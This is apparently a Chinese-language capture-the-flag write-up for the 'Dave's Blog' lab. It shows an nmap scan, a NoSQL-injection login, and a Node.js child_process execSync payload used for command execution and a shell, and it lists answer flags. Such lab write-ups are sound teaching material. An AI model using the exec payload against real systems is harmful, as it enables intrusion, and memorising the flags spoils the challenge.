Skip to main content

Dave's Blog

端口扫描

root@ip-10-10-80-160:~/davesblog# nmap -sTCV -p- --min-rate 1000 10.10.96.55
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-18 06:52 GMT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:01:52 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 06:54 (0:00:06 remaining)
Nmap scan report for ip-10-10-96-55.eu-west-1.compute.internal (10.10.96.55)
Host is up (0.00055s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:31:1f:9f:b4:a1:10:9d:a9:69:ec:d5:97:df:1a:34 (RSA)
|   256 e9:f5:b9:9e:39:33:00:d2:7f:cf:75:0f:7a:6d:1c:d3 (ECDSA)
|_  256 44:f2:51:7f:de:78:94:b2:75:2b:a8:fe:25:18:51:49 (EdDSA)
80/tcp   open   http         nginx 1.14.0 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Dave's Blog
3000/tcp open   http         Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: Dave's Blog
8989/tcp closed sunwebadmins
MAC Address: 02:75:69:7D:C2:3B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.39 seconds

3000

进行目录枚举并没有发现什么特别的内容, 查看网站可以发现其显示内容为, 网站使用的数据库为 NOSQL 同时也知道网站使用的是 NodeJs 的技术, 于此同时查看网络抓包发现网站使用的程序框架为 Express,

image-20240709214521162

这里告诉了数据库的类型, 不来一波 SQL 注入对不起他, 直接找 payload 上, Nosql 注入从零到一 - 先知社区

image-20240709214602883

此时就得到数据库中的内容, 将其进行解密之后就可以得到对应的用户账号, 进行登陆之后, 我意识到这估计是 SSTI 漏洞, 因此进行了尝试发现确认是 SSTI 漏洞, 之后我开始了 EXP 的查找之路最终发现一条 payload

{"exec":"require('child_process').execSync('whoami').toString();"}

image-20240709214628583

后渗透

dave

使用上面获取到 命令执行漏洞进行攻击, 最终获取到了一个 Shell

image-20240709214700282

dave —> root

执行 sudo -l 命令发现用户 dave 存在一个 root 特权对应的这里需要进行逆向分析, 不会

image-20240709214707455

扩展

Flag 3、4

对于 Flag 3 其存储的位置根据提示得知是在 mongo 数据库当中

> db.whatcouldthisbes.find()
{ "_id" : ObjectId("5ec6e5cf1dc4d364bf864108"), "whatCouldThisBe" : "THM{993e107fc66844482bb5dd0e4c485d5b}", "__v" : 0 }

对于 flag4 则存在于我们的 uid_checker 文件当中

THM{runn1ng_str1ngs_1s_b4sic4lly_RE}
Wow! You found the secret function! I still need to finish it..